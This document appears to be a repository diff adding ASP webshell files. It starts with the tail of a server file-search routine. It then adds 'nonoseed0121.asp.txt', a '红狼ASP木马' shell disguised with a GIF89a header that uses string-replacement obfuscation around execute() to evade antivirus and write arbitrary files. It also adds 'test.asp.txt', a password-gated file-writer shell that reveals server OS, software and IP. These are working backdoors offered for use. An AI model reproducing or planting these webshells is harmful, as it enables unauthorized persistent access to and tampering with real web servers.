FileTxt=LCase(oFile.ReadAll())
If InStr(FileTxt,LCase(Request.Form("Search_Content")))>0 Then
Report=Report&"<tr><td>"&Temp&"</td><td>"&GetDateCreate(ThePath)&"</td><td>"&TheDate&"</td></tr>"
Sun=Sun+1
Exit Sub
End If
oFile.close()
Set oFile=Nothing
Else
Report=Report&"<tr><td>"&Temp&"</td><td>"&GetDateCreate(ThePath)&"</td><td>"&TheDate&"</td></tr>"
Sun=Sun+1
Exit Sub
End If
End If
Next
End Sub
Sub ShowAllFileQT(Path)
If Not FSO.FolderExists(Path) Then Exit Sub
Set f=FSO.GetFolder(Path)
Set fc2=f.Files
For Each MyFile In fc2
On Error Resume Next
TmpDot=InStrRev(Path&"\"&MyFile.Name,".")
TmpBackSlash=InStrRev(Path&"\"&MyFile.Name,"\")
TmpSlash=InStrRev(Path&"\"&MyFile.Name,"/")
If TmpBackSlash>TmpDot Or TmpSlash>TmpDot Then
TempFile=LCase(Path&"\"&MyFile.Name)
Else
TempFile=LCase(Left(Path&"\"&MyFile.Name,InStrRev(Path&"\"&MyFile.Name,".")-1))
End If
If InStr(TempFile,".asp")<>0 Or InStr(TempFile,".asa")<>0 Or InStr(TempFile,".cer")<>0 Or InStr(TempFile,".cdx")<>0 Then
Call IsFindAsp(Path&"\"&MyFile.Name)
End If
SumFiles=SumFiles+1
Next
Set fc=f.SubFolders
For Each f1 In fc
ShowAllFileQT Path&"\"&f1.Name
SumFolders=SumFolders+1
Next
Set fc=Nothing
Set fc2=Nothing
Set f=Nothing
End Sub
Sub IsFindAsp(ThePath)
TheDate=GetDateModify(ThePath)
On Error Resume Next
If SearchType=1 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(WebSiteRoot))>0 Then
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&"/"&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),WebSiteRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
ElseIf SearchType=2 Or InStr(Replace(LCase(ThePath),"\\","\"),LCase(CurrentlyRoot))>0 Then
Temp=ThePath&"<br><a href=""http://"&ServerName&ServerPort&Replace(URL,FileName,"")&tURLEncode(Replace(Replace(Replace(ThePath,"\\","\"),CurrentlyRoot&"\","",1,1,1),"\","/"))&""" target=_blank>访问此页</a> <a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
Else
Temp=ThePath&"<br><a href=""?filemanager=showfile&filepath="&tURLEncode(ThePath)&""" target=_blank>查看文件代码</a>"
End If
Report=Report&"<tr><td>"&Temp&"</td><td>"&GetDateCreate(ThePath)&"</td><td>"&TheDate&"</td></tr>"
Sun=Sun+1
End Sub
Set FSO=Nothing
%>

41
asp/luoss.asp.txt Normal file
View file

File diff suppressed because one or more lines are too long

80
asp/nonoseed0121.asp.txt Normal file
View file

@ -0,0 +1,80 @@
<gif89a>
<Title>红狼ASP木马--Anfly免杀版</Title>
<%Dim objfSo%>
<% dim user
user="asp.asp"%><%''将""中的东东改成你木马保存的文件名不要使用dst 或者exe&cute%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%
Function DecodeFun(MidStr)
MidStr = Replace(MidStr, "#!^$W", "s")
MidStr = Replace(MidStr, "人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶人类智力劳动的结晶", "<br>")
MidStr = Replace(MidStr, "#sdf", "End If")
MidStr = Replace(MidStr, "*&*s", ">")
MidStr = Replace(MidStr, "#!@$", "<")
MidStr = Replace(MidStr, "h45as", "(")
MidStr = Replace(MidStr, "w$@s", ")")
MidStr = Replace(MidStr, "a&d%&", Chr(34))
DecodeFun = MidStr
End Function
%>
<%
pass=request("pass")
if pass="open" then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile = objFSO.OpenTextFile(Server.MapPath(user),1,True)
FiletempData = objCountFile.ReadAll
objCountFile.Close
FiletempData=Replace(FiletempData,"dst","exe"&"cute")
Set objCountFile=objFSO.CreateTextFile(Server.MapPath(user),True)
objCountFile.Write FiletempData
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
response.write "木马防杀解除"
end if
if pass="close" then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
Set objCountFile = objFSO.OpenTextFile(Server.MapPath(user),1,True)
FiletempData = objCountFile.ReadAll
objCountFile.Close
FiletempData=Replace(FiletempData,"exe"&"cute","dst")
Set objCountFile=objFSO.CreateTextFile(Server.MapPath(user),True)
objCountFile.Write FiletempData
objCountFile.Close
Set objCountFile=Nothing
Set objFSO = Nothing
response.write "木马防杀完毕"
end if
%>
<%char1="Set objfSo = Server.CreateObjecth45asa&d%&Scripting.fileSy#!^$WtemObjecta&d%&w$@s"
execute(DecodeFun(char1))%>
<%if Trim(request("syfdpath"))<>"" then%>
<%char1="fdata = reque#!^$Wth45asa&d%&cyfddataa&d%&w$@s"
execute(DecodeFun(char1))%>
<%char1="Set objCountFile=objFSO.CreateTextFileh45asreque#!^$Wth45asa&d%&#!^$Wyfdpatha&d%&w$@s,Truew$@s"
execute(DecodeFun(char1))%>
<%char1="objCountFile.Write fdata"
execute(DecodeFun(char1))%>
<%if err =0 then%>
OK!</font>
<%else%>
NO!</font>
<%end if%>
<%err.clear%>
<%end if%>
<%char1="objCountFile.Clo#!^$We"
execute(DecodeFun(char1))%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<form action='' method=pOsT>
PATH:</font><br>
<input type=text name=syfdpath width=32 value="
<%char1="re#!^$Wpon#!^$We.write #!^$Werver.mappathh45asReque#!^$Wt.ServerVariable#!^$Wh45asa&d%&SCRIPT_NAMEa&d%&w$@sw$@s"
execute(DecodeFun(char1))%>" style="border:solid 1px" size=40><br>
GUT:<br>
<textarea name=cyfddata cols=39 rows=10 width=80 style="border:solid 1px"></textarea>
<br><input type=submit value=SAVE style="border:solid 1px">
</form>

54
asp/test.asp.txt Normal file
View file

@ -0,0 +1,54 @@
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>STHx 渗透小组专用 ASP小马 by: STHx QQ:188388" </title>
<%
on error resume next
%>
<%
if request("pass")="hacker!@#" then '在这修改密码
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='我要进去'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="yes"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="操作系统为:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%="<font face='黑体' color='red'> write by STHx QQ:188388 </font>"%>
<%="<a href='tencent://message/?uin=188388'>联系我</a>"%>
<%end if%></body></html>

1285
asp/传说中的hcker.asp.txt Normal file
View file

File diff suppressed because one or more lines are too long